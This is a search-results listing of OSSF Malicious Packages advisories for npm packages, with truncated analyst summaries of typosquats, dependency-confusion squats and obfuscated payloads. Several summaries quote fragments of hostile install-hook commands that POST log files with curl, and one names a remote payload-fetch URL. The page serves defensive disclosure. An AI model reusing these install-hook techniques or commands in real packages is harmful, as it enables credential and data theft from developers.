Lucene search
K

226511 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 8:40 p.m.6 views

Malicious code in ref-slot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1e1ef3e785cf6cb007c0b33be2ed43ebe49d64f476bb4fb3a66b914b06def5e1 On npm install, the package's postinstall hook runs node test.js which invokes index.js to perform multi-stage installer compromise. 1 Credential...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 8:32 p.m.5 views

Malicious code in typedecode (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 593662d3b4cda901642b713f419417807a33f3dca74e818f66e8d0cf9ebcf6e3 On require'typedecode' / import 'typedecode', the bundled dist/index.cjs and dist/index.js execute an obfuscated import-time payload. A bootstrap.js...

6.1AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 8:26 p.m.7 views

Malicious code in textshape-css (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4e596e1ea1365aadfa6c75047b664bb41b29b60828595b9271d4c2c217476b60 The package presents itself as a Tailwind CSS typography plugin its name, description, and source tree clone @tailwindcss/typography, but src/index.j...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 8:16 p.m.6 views

Malicious code in colorpicker-ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 226e4e81049c5688a16a198fb9a90ab3d11d371b621e367da4590632f4e5e140 Package presents itself as a minimal React color-picker but ships a postinstall hook "postinstall": "node setup.js" that performs targeted credential...

6.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:43 p.m.5 views

Malicious code in tailwind-color-shades (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dfd681005962f5628f4394450bae9430992e58159e3256bb4af2bc156c5c1fc5 The package's documented entry point index.ts begins with import './src/bootstrap';, which causes src/bootstrap.js to run whenever the module is...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:43 p.m.6 views

Malicious code in tailwindcss-effector (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4780f88b1924c1d5104a4ea18803a0180e9339e5c9a9bf787f9ed4901e1729e3 src/index.js appends a heavily obfuscated async IIFE after a legitimate-looking TailwindCSS plugin. On import, the IIFE issues HTTPS requests to remo...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:27 p.m.6 views

Malicious code in chlklib (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b08a933891c92fdec26fbadf4921d2e08ff101126fb656a2b57d747fefa9d0d4 Package name chlklib is a one-character deletion of the popular chalk package and replicates chalk's public API surface Chalk, chalkStderr,...

6AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:11 p.m.10 views

Malicious code in ts-precision (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e7d2534408d7dd1d7f02c3ef470bc697d0803e8acd58941de5974a250127cb8c Package ships a verbatim copy of big.js v7.0.1 including the original author metadata 'Michael Mclaughlin ' and repo reference MikeMcl/big.js under a...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:11 p.m.7 views

Malicious code in ts-opus (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 73b0105b34723dd6e1449c3353d1d4df0dcf94ae460a4dfd156566bb4ba372c7 ts-opus 0.0.8 ships an unmodified copy of MikeMcl/big.js README, copyright, and repository URL all reference big.js but injects an additional top-lev...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 5:20 p.m.7 views

Malicious code in @vpms/design-system (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 43ce5813fba2660b094a3e8a5c5a0bf2f1972530c294830c0a2e3d15dcd1b096 package.json declares preinstall="node index.js". On every npm install, index.js iterates process.env and harvests any variable whose name contains...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 5:13 p.m.6 views

Malicious code in chai-as-built (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 469c5ebe97d1e69d080295000d723febbb06050f65aed9a0f44a76fd707c0b1e chai-as-built masquerades as the pino logger package.json keywords 'fast','logger','stream','json'; file layout lib/proto.js, lib/redaction.js,...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 5:6 p.m.7 views

Malicious code in gx-npm-feature-flags (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7fcad1b944d9ceb92389673398df9f471911a788fe608774a3298c69900bb1c7 [email protected] is a dependency-confusion squat max-semver 99.99.99 on a gx--prefixed name to outrank a private internal package that...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 5:0 p.m.5 views

Malicious code in @colibri-event-types/megamarket-ru-web (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c4780aaf3b99e11830e6a5eda56c287f9f8e93d375f1f59320ecc9849ebdf4fe scripts/postinstall.js is registered as the npm postinstall lifecycle script and is heavily packed with obfuscator.io string-array rotation plus a...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 3:26 p.m.6 views

Malicious code in abu-common-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 17e7b4ac8a492915d8475c73488b64236250746de410c705b7cc43c0656589be package.json declares preinstall and postinstall hooks that invoke curl against a hardcoded bare-IP HTTP endpoint...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:51 a.m.11 views

Malicious code in dttsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:11 a.m.7 views

Malicious code in easy-string-kit232 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9c3f74b6873c47dc8f3a6d6922e9d66d17cafe47b7a80447f45bfe0d1535a6b5 package.json declares a postinstall lifecycle script that auto-executes on npm install and runs curl -X POST -d "$ls -la /data/logs/"...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:5 a.m.8 views

Malicious code in dddooo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-16.log"...

6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 8:39 a.m.5 views

Malicious code in easy-string-kit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8cb77d96cfd133340395df1765df2426f8414d80158e62ee5832ab6d4a18e803 package.json declares a postinstall lifecycle script that automatically runs on npm install and executes roughly 25 curl POST requests harvesting...

6AI score
Exploits0References8
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 7:26 a.m.3 views

Malicious code in wp-codebox-workspace (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a44aa2030ed09d6ec3998c59953a44e013c1993d93a90ee031b0999480afb03c Package is published at version 9999.99.99 with a description referencing an 'npm 404 error referenced in Extra-Chill/homeboy-extensions' — the...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 7:26 a.m.4 views

Malicious code in simple-node-calc-c (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 289de4cd84a2ac40ef42f8b449ba58e9d8900d766a0638061ef2e75092b1f1a4 Package advertises itself as a 7-function calculator but ships an undeclared 87KB heavily obfuscated file lodash-compiler.js obfuscator.io string-arr...

6.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 7:26 a.m.7 views

Malicious code in simple-node-calc-a (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f9a86d4aeac1d4f5fc458b3058f4b13229cd2097c9d8e5cf3e4d45aa24980ad8 [email protected] advertises itself as a pure-JS calculator but ships a binding.gyp that triggers node-gyp automatically during npm install...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 7:26 a.m.5 views

Malicious code in simple-node-calc-b (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 78b115418f82ef73f995f3bf6b0cb8bf50da516b56c691b76ccb939491d2b046 [email protected] ships a binding.gyp that includes a modules file declaring "lodash": "!node lodash-compiler.js". The gyp !... syntax execute...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 7:26 a.m.5 views

Malicious code in simple-node-calc-aa (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7274769c1f72a3c00ec34290bd2e0dff85b9c41d6a85cfffc1b164b46280de72 Package advertises itself as a trivial arithmetic helper but ships a binding.gyp whose sources list uses gyp's !... shell expansion: "!node...

6.2AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 7:26 a.m.6 views

Malicious code in simple-node-calc-ccc (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f9bfe35484999f40374a6dcfea11247cf3407a3177e27506c714407b9384036a Package name 'simple-node-calc-ccc' presents as a trivial calculator but ships lodash-compiler.js, an 87KB obfuscator.io-packed file using rotating...

6.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 7:21 a.m.5 views

Malicious code in subsearch (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04245cd013e6aa9edb766cf14249c9dd6abd19d6beb9671c22a1a8bbbff3d511 The package's main entry index.js is the only file of substance and is wrapped in obfuscator.io string-array + RC4 obfuscation that hides every liter...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 7:10 a.m.6 views

Malicious code in stitch-design (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 81a0c5de3abe7924f58304e27e1537821c217c9348c060b31c5424407f9f10cc The npm package ships a preinstall lifecycle hook scripts/preinstall.js that, on npm install, reads classic installer-secret paths — /.gitconfig,...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:53 a.m.5 views

Malicious code in based-32 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 52ca241d887ed83628c8c4a4432ca0f832d092e6058c7ab4250cc5b169ba7fb9 based-32 advertises itself as a zero-dependency RFC4648 Base32 encoding library, but dist/index.js ships a hidden trigger inside the exported...

6.2AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:46 a.m.4 views

Malicious code in howdybase32 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c0eab759e668db62de0eaa10d1f5d32c689b00c7c3d6d2b1517439cc5df3e956 The package advertises itself as a fast, zero-dependency base32 encoder/decoder, but its only bin entry bin/hibase32.js silently invokes...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:46 a.m.5 views

Malicious code in nizzybase32 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cd8ad52e73a1c796a1dbe22501f4ef2d42f3ceea98cc259e1ceefb1a214cfa56 The CLI in bin/hibase32.js computes SHA256 of user input and, on one hardcoded magic digest...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:43 a.m.6 views

Malicious code in base58-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 048a186e2e59bb0b7d9986c7099e527390e38690292bc49e237578a471c56680 The package advertises itself as a Base58 encoder/decoder but on require schedules a delayed payload that performs multiple installer-side attacks...

6AI score
Exploits0References12
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:43 a.m.4 views

Malicious code in bs58-86 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 057e2e470e0bc9dbfd2ff37955c0c7d051cca944025b9d62c882ffc98c4434e5 Package [email protected] reproduces the name, README, repository URL cryptocoinjs/bs58, and exported API of the widely-used bs58 base58 encoding library...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:42 a.m.6 views

Malicious code in base62-86x (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 811002816e7f72588c7c6540b088af5c44b8280574e43dbaeef4701fe377fe9f Package impersonates the legitimate base-x/base62 library by Daniel Cousens name base62-86x, homepage pointing at cryptocoinjs/base-x, identical sour...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:39 a.m.6 views

Malicious code in agentsync-tool (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 430fd9891020d33aa720cede12887f97615ac764bd8af19dc27f18bba4729c38 The package advertises itself as a zero-dependency pure-JS markdown sync tool 150 lines but ships an undocumented 2.9MB Windows PE binary at...

6.1AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:39 a.m.6 views

Malicious code in agentsync-pkg (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b383c760dffae4a26d7f94b433bbe00dedb2426b23f4713610d6f5f36c594cf1 On every import / require'agentsync-pkg', src/index.js line 152 resolves bin/native/parser.node and calls require on it: const p =...

6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 6:14 a.m.6 views

Malicious code in logfmt-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bb22b2557674e7d616805d8a4086d69e02896be169b9e5d4d053eb3628ebe038 On npm install, scripts/install-check.cjs registered as a postinstall lifecycle script fetches a JSON config from a hardcoded anonymous Vercel app UR...

6.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 5:56 a.m.6 views

Malicious code in polymarket-stake-math (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a8a5200cef3811ce98e489080709917dfafc2216a17f90329b9930e0f5f630a1 The package ships a postinstall hook scripts/sync-peer.cjs that runs on every default npm install. The script compares the installed version against ...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 5:56 a.m.5 views

Malicious code in polymarket-stake-maths (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 657363aaa0b94385d30a26c1f4ee67923b0d877975850ad08f8364c2a901d8e7 On npm install, the package's postinstall script scripts/install-check.cjs fetches a JSON config from...

6.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 5:49 a.m.5 views

Malicious code in easy-time-format (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 68e3ed59cdf42b986633df92080189576ccb0c6482e9418dab47b72ac45cf97b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 5:29 a.m.5 views

Malicious code in tokenization-util (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 81f8a194aa79844110dede95f5f8c798d05c04c08f1a4f5d8822124b17c65fa6 The package advertises plain math/formatter helpers but index.js contains a heavily obfuscated payload concealed inside the calculateTokenPrice...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 4:57 a.m.5 views

Malicious code in unifydata (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0c62d93328810f03f3aac73777f406eee1b3413e1c3320eb87f3445754dba9d3 On require'unifydata', index.js calls initPlugin at module top level, performs an HTTPS GET to https://jsonkeeper.com/b/B40HL, JSON-parses the...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 4:43 a.m.7 views

Malicious code in anthropic-claude-latest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 39eab369e2498da827d3bbd331effdf24b99ab28961e62da7328e4476e328876 Package anthropic-claude-latest claims to be an 'Official Anthropic Claude SDK wrapper' but ships no Anthropic SDK code; the README is for an unrelat...

6.5AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 4:29 a.m.6 views

Malicious code in block-slot (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 45d25c6b3ae56eaaf7f76995fc0b6f93a8499b9cbe2315446a63cb5601d841d4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 2:16 a.m.6 views

Malicious code in poc-publish-test-su-doughnym (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 54e0dbb8f5ce514035d0c4596f5b78b47f14ab145f2d43172bf13b595df78661 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 2:16 a.m.5 views

Malicious code in @su-doughnym/react-dlb (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 3c4b5ea9035f910a7193b9da02623e92d8364869382bf683b3469ea3a2b46fdc Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 2:16 a.m.6 views

Malicious code in @su-doughnym/loginui (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 97528ba896a094d6b1ed4306c1553ae6f3887d808d4e4bcb6d03d9ee29e1a8b6 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 2:16 a.m.7 views

Malicious code in nabisco (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 4c6b974c237c0a7f1806c58521bb7f5353e013785144f2124b21d0fe676c2b7c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 2:16 a.m.7 views

Malicious code in @su-doughnym/metrics-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c1b02acc9d8d069bfdf5db415cb18c33e05ffdcd577532cfc3dbd112e4d9a6f6 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 2:16 a.m.5 views

Malicious code in two-factor-prompt-lib (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d7f55251c2837eacfe7f8b0c2ab44077608dc2562f3c167dc1d2927b9f730fad Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 2:16 a.m.7 views

Malicious code in @su-doughnym/hubspot-loginui-poc (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware e22fa4def0472cf65c32dfc2476ccebd428bc92163cb0095bea52240b1c1c914 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 2:16 a.m.8 views

Malicious code in data-fetching-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 7e3b28cd7d92e52caebbbc24439e3075e592ca43dbeb5cd711d4ccb3df74c1ec Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
Total number of security vulnerabilities226511